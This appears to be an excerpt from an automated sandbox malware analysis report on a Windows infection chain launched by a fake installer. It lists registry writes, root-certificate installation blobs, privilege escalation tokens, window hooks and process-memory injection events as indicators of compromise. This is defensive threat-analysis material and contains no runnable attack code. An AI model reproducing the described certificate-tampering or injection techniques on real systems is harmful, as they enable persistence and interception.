Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{082D3FEC-D0D0-4DF6-A988-053FECE7B884}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\\1"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Directory\Background\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "404"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "Microsoft Speech HW Voice Activation - English (United States)"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sun05ac1b0207d3ff3b8.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun05ac1b0207d3ff3b8.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	61	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	139	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4468	powershell.exe
4468	powershell.exe
2216	Sun05532f7abc.exe
2216	Sun05532f7abc.exe
4468	powershell.exe
4468	powershell.exe
4468	powershell.exe
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
4512	WerFault.exe
3064	Explorer.EXE
3064	Explorer.EXE
4888	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3064	Explorer.EXE

Suspicious behavior: MapViewOfSection 18 IoCs

pid	Process
2216	Sun05532f7abc.exe
7144	MicrosoftEdgeCP.exe
7144	MicrosoftEdgeCP.exe
5500	stgbdvv
7144	MicrosoftEdgeCP.exe
7144	MicrosoftEdgeCP.exe
7144	MicrosoftEdgeCP.exe
7144	MicrosoftEdgeCP.exe
7144	MicrosoftEdgeCP.exe
7144	MicrosoftEdgeCP.exe
7672	stgbdvv
7144	MicrosoftEdgeCP.exe
7144	MicrosoftEdgeCP.exe
6788	MicrosoftEdgeCP.exe
6788	MicrosoftEdgeCP.exe
6360	stgbdvv
6788	MicrosoftEdgeCP.exe
6788	MicrosoftEdgeCP.exe

Suspicious behavior: SetClipboardViewer 2 IoCs

pid	Process
3728	2967757.exe
3872	5077757.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeAssignPrimaryTokenPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeLockMemoryPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeIncreaseQuotaPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeMachineAccountPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeTcbPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeSecurityPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeTakeOwnershipPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeLoadDriverPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeSystemProfilePrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeSystemtimePrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeProfSingleProcessPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeIncBasePriorityPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeCreatePagefilePrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeCreatePermanentPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeBackupPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeRestorePrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeShutdownPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeDebugPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeAuditPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeSystemEnvironmentPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeChangeNotifyPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeRemoteShutdownPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeUndockPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeSyncAgentPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeEnableDelegationPrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeManageVolumePrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeImpersonatePrivilege	740	Sun05d60bc3b96248e5.exe
Token: SeCreateGlobalPrivilege	740	Sun05d60bc3b96248e5.exe
Token: 31	740	Sun05d60bc3b96248e5.exe
Token: 32	740	Sun05d60bc3b96248e5.exe
Token: 33	740	Sun05d60bc3b96248e5.exe
Token: 34	740	Sun05d60bc3b96248e5.exe
Token: 35	740	Sun05d60bc3b96248e5.exe
Token: SeDebugPrivilege	1788	WerFault.exe
Token: SeDebugPrivilege	4236	Sun050462125c7d35.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeDebugPrivilege	3548	2.exe
Token: SeDebugPrivilege	5084	4402665.exe
Token: SeDebugPrivilege	1352	PublicDwlBrowser1100.exe
Token: SeShutdownPrivilege	3064	Explorer.EXE
Token: SeCreatePagefilePrivilege	3064	Explorer.EXE
Token: SeShutdownPrivilege	3064	Explorer.EXE
Token: SeCreatePagefilePrivilege	3064	Explorer.EXE
Token: SeShutdownPrivilege	3064	Explorer.EXE
Token: SeCreatePagefilePrivilege	3064	Explorer.EXE
Token: SeDebugPrivilege	4436	BearVpn 3.exe
Token: SeRestorePrivilege	4888	WerFault.exe
Token: SeBackupPrivilege	4888	WerFault.exe
Token: SeShutdownPrivilege	3064	Explorer.EXE
Token: SeCreatePagefilePrivilege	3064	Explorer.EXE
Token: SeShutdownPrivilege	3064	Explorer.EXE
Token: SeCreatePagefilePrivilege	3064	Explorer.EXE
Token: SeShutdownPrivilege	3064	Explorer.EXE
Token: SeCreatePagefilePrivilege	3064	Explorer.EXE
Token: SeShutdownPrivilege	3064	Explorer.EXE
Token: SeCreatePagefilePrivilege	3064	Explorer.EXE
Token: SeShutdownPrivilege	3064	Explorer.EXE
Token: SeCreatePagefilePrivilege	3064	Explorer.EXE
Token: SeShutdownPrivilege	3064	Explorer.EXE
Token: SeCreatePagefilePrivilege	3064	Explorer.EXE
Token: SeShutdownPrivilege	3064	Explorer.EXE
Token: SeCreatePagefilePrivilege	3064	Explorer.EXE
Token: SeShutdownPrivilege	3064	Explorer.EXE

Suspicious use of FindShellTrayWindow 30 IoCs

pid	Process
3064	Explorer.EXE
2648	setup_2.tmp
5476	ultramediaburner.tmp
6444	installer.exe
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE
3064	Explorer.EXE

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
3064	Explorer.EXE

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
3064	Explorer.EXE
4244	MicrosoftEdge.exe
6884	MicrosoftEdgeCP.exe
6884	MicrosoftEdgeCP.exe
7196	cmd.exe
5052	MicrosoftEdge.exe
7144	MicrosoftEdgeCP.exe
7144	MicrosoftEdgeCP.exe
4364	MicrosoftEdge.exe
6788	MicrosoftEdgeCP.exe
6788	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4876 wrote to memory of 4920	4876	setup_x86_x64_install.exe	75
PID 4876 wrote to memory of 4920	4876	setup_x86_x64_install.exe	75
PID 4876 wrote to memory of 4920	4876	setup_x86_x64_install.exe	75
PID 4920 wrote to memory of 5016	4920	setup_installer.exe	76
PID 4920 wrote to memory of 5016	4920	setup_installer.exe	76
PID 4920 wrote to memory of 5016	4920	setup_installer.exe	76
PID 5016 wrote to memory of 1916	5016	setup_install.exe	79
PID 5016 wrote to memory of 1916	5016	setup_install.exe	79
PID 5016 wrote to memory of 1916	5016	setup_install.exe	79
PID 5016 wrote to memory of 4164	5016	setup_install.exe	80
PID 5016 wrote to memory of 4164	5016	setup_install.exe	80
PID 5016 wrote to memory of 4164	5016	setup_install.exe	80
PID 5016 wrote to memory of 4176	5016	setup_install.exe	83
PID 5016 wrote to memory of 4176	5016	setup_install.exe	83
PID 5016 wrote to memory of 4176	5016	setup_install.exe	83
PID 5016 wrote to memory of 3752	5016	setup_install.exe	82
PID 5016 wrote to memory of 3752	5016	setup_install.exe	82
PID 5016 wrote to memory of 3752	5016	setup_install.exe	82
PID 5016 wrote to memory of 3348	5016	setup_install.exe	81
PID 5016 wrote to memory of 3348	5016	setup_install.exe	81
PID 5016 wrote to memory of 3348	5016	setup_install.exe	81
PID 5016 wrote to memory of 3280	5016	setup_install.exe	87
PID 5016 wrote to memory of 3280	5016	setup_install.exe	87
PID 5016 wrote to memory of 3280	5016	setup_install.exe	87
PID 3348 wrote to memory of 3560	3348	cmd.exe	84
PID 3348 wrote to memory of 3560	3348	cmd.exe	84
PID 3348 wrote to memory of 3560	3348	cmd.exe	84
PID 5016 wrote to memory of 3688	5016	setup_install.exe	85
PID 5016 wrote to memory of 3688	5016	setup_install.exe	85
PID 5016 wrote to memory of 3688	5016	setup_install.exe	85
PID 5016 wrote to memory of 4224	5016	setup_install.exe	86
PID 5016 wrote to memory of 4224	5016	setup_install.exe	86
PID 5016 wrote to memory of 4224	5016	setup_install.exe	86
PID 5016 wrote to memory of 3024	5016	setup_install.exe	92
PID 5016 wrote to memory of 3024	5016	setup_install.exe	92
PID 5016 wrote to memory of 3024	5016	setup_install.exe	92
PID 5016 wrote to memory of 4112	5016	setup_install.exe	91
PID 5016 wrote to memory of 4112	5016	setup_install.exe	91
PID 5016 wrote to memory of 4112	5016	setup_install.exe	91
PID 5016 wrote to memory of 3980	5016	setup_install.exe	88
PID 5016 wrote to memory of 3980	5016	setup_install.exe	88
PID 5016 wrote to memory of 3980	5016	setup_install.exe	88
PID 4224 wrote to memory of 4236	4224	cmd.exe	90
PID 4224 wrote to memory of 4236	4224	cmd.exe	90
PID 3688 wrote to memory of 740	3688	cmd.exe	89
PID 3688 wrote to memory of 740	3688	cmd.exe	89
PID 3688 wrote to memory of 740	3688	cmd.exe	89
PID 3024 wrote to memory of 3288	3024	cmd.exe	94
PID 3024 wrote to memory of 3288	3024	cmd.exe	94
PID 4176 wrote to memory of 1848	4176	cmd.exe	93
PID 4176 wrote to memory of 1848	4176	cmd.exe	93
PID 4176 wrote to memory of 1848	4176	cmd.exe	93
PID 3280 wrote to memory of 1788	3280	cmd.exe	136
PID 3280 wrote to memory of 1788	3280	cmd.exe	136
PID 3752 wrote to memory of 2216	3752	cmd.exe	100
PID 3752 wrote to memory of 2216	3752	cmd.exe	100
PID 3752 wrote to memory of 2216	3752	cmd.exe	100
